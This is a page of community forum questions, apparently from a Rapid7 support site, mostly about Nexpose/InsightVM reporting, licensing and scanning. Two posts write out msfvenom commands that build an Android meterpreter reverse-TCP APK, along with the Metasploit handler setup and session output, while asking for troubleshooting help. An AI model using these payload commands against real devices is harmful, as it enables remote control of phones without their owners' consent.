Is the nexpose(insightVM) possible to scan for CVE-2017-13077,CVE-2017-13078,CVE-2017-13079,CVE-2017-13080,CVE-2017-13081,CVE-2017-13082,CVE-2017-13084,CVE-2017-13086,CVE-2017-13087,CVE-2017-13088? https://www.krackattacks.com/
Posted by Yu Iwama about a year ago
Hi. Last week I downloaded and installed Metasploit Pro trial version. I have performed a scan on our PCIDSS network (192.168.25.0/24). When I look at the reports I do not see all of the possible Hosts being checked. Is this a limitation of the trial version ? I also cannot find pricing for it.
Posted by Glenn Chadwick about a year ago
I want to be able to examine how an exploit makes it way through from the Metaspoit system all the way to compromised system but I need to be able to visualize the attack graphically. Once the exploit hits the compromised system can what the exploit does be captured graphically step by step as the exploit reaches the NIC from the wire and then onward.
Posted by Victor M about a year ago
Hello, It seems NexPose Virtual Appliance is not supported in the following environment: VMware ESXi 6.0 and 6.5. Is it already supported but is not documented ? Otherwise, can we expect a new OVF file to be released very soon ? https://kb.help.rapid7.com/v1.0/docs/insightvm-and-nexpose-virtual-appliance-guide Regards, Paulo Rio
Posted by Paulo Rio about a year ago
Is it possible in a report or asset group to somehow display the risk generated by one specific piece of software? Lets say I have an asset group for all machines with Mozilla Firefox installed and I want to see the risk generated by that program on all the machines it is present on at a glance, without having to click into each machine and totaling up the risk scores from any issues related to it. I tried running a report where I selected vulnerability filters and excluded everything but the Mozilla categories, but I still get a report that shows all the vulnerabilities present on all the machines that have Firefox installed.
Posted by Michael Barnocki about a year ago
I created an apk file via msfvenom, root@root:~$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.54 LPORT=4444 R > met.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8805 bytes intsalled an android phone root@root:~$ adb install met.apk met.apk: 1 file pushed. 2.5 MB/s (8812 bytes in 0.003s) pkg: /data/local/tmp/met.apk Success and opened mainactivity app from android launcher. Then i open msfconsole and run exploit cammand root@root:~$ msfconsole =[ metasploit v4.16.11-dev- ] + -- --=[ 1694 exploits - 968 auxiliary - 299 post ] + -- --=[ 499 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.43.54 LHOST => 192.168.43.54 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Exploit running as background job 0. msf exploit(handler) > [*] Started reverse TCP handler on 192.168.43.54:4444 [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.54:4444 -> 192.168.43.1:42939) at 2017-10-12 18:57:59 +0530 this shows only Meterpreter session 1 opened and does not open Meterpreter shell Meterpreter> i used metasploit framework v4.16.11-dev- on ubuntu 17.04 LTS how can i do?
Posted by shamil about a year ago
Hi, I need to move some machines from one scan group to another but retain the scan history of the machines, so I was going to use the “Remove asset from site” option. I have tried this on a small number of machines but when I then scan those machines the Vulnerable Since column has todays date listed, with no dates older than that, which there should be. VMS stated “Historical data will be kept” so shouldn’t it keep the original date of the vulnerabilities? Is there a way to keep those dates? Am I doing the transfer wrongly? Is there another way to do it? Thanks.
Posted by Andrew Edmunds about a year ago
Hello! I am testing right now but i can not add my endpoint range. Collector is running, AD and DHCP are configured,.. but i can not go on with agents. I want to add the range but i get: An internal server error has occurred. thx alexander
Posted by Alexander Jesse about a year ago
It's very frustrating that we are not able to create remediation projects from the "Vulnerability Information" view. We only see the option "export to csv" Is this something that is planned fixed?
Posted by Torb about a year ago
If I were to move a licence from one server to another, how would I go about that? This is for a migration to newer hardware. Last time I did this I was advised by r7 to "deactivate" my licence and move it over, however I have not found a method for this. Thank you
Posted by Things about a year ago
Greetings! Does anyone have a Report template or example SQL Query which simply pulls the number of Critical Vulnerabilities across different selected Sites or Asset Groups. E.g. data would be: Asset Group 1: 3939 critical vulns Asset Group 2: 323 critical vulns Asset Group 3: 5904 critical vulns
Posted by Schuyler Dorsey about a year ago
I'm trying to access a rooted android with no protection that is connected to my network and I have access to install or delete anything on. I port forwarded from router page to my ifconfig ip and port 4444, I even enabled DMZ that allows any incoming and outgoing connection. router firewall is off windows firewall is off, added inbound and outbound rules too even went to add gufw rules vmware is in bridged connection kali is official iso installed on vmware. msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=publicIP LPORT=4444 R>name.apk msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST ifconfig ip set LPORT 4444 exploit >installed apk and opened in android Then I just get this: running as background 0 started reverse tcp handler at ifconfig ip:4444 then just goes back to: msf[handler] > without even waiting to open the apk, or anything, never got any meterpreter shell. Tried everything. By swapping public ip and LHOST with ifconfig. Tried updating kali with apt-etc.. rebooting. just I always get same result above. What' the issue? The android mobile is connected to same network. :
Posted by Naimre about a year ago
Hello, I am trying to perform a CIS scan of a Windows 7 embedded system in order to harden the system. This is a thin client and one of the requirements for the applications to run correctly requires Microsoft IIS. This requirement is causing me issues with performing the CIS scan against the OS configuration as Nexpose only performs CIS scans against IIS and Internet explorer. I want to configure Nexpose to specifically focus on Windows 7 but i've been unable to achieve this. I have created a scan policy only including the Windows 7 baselines but it still fails. Has anybody encountered this issue and aware of a workaround? Thanks, Craig
Posted by Craig about a year ago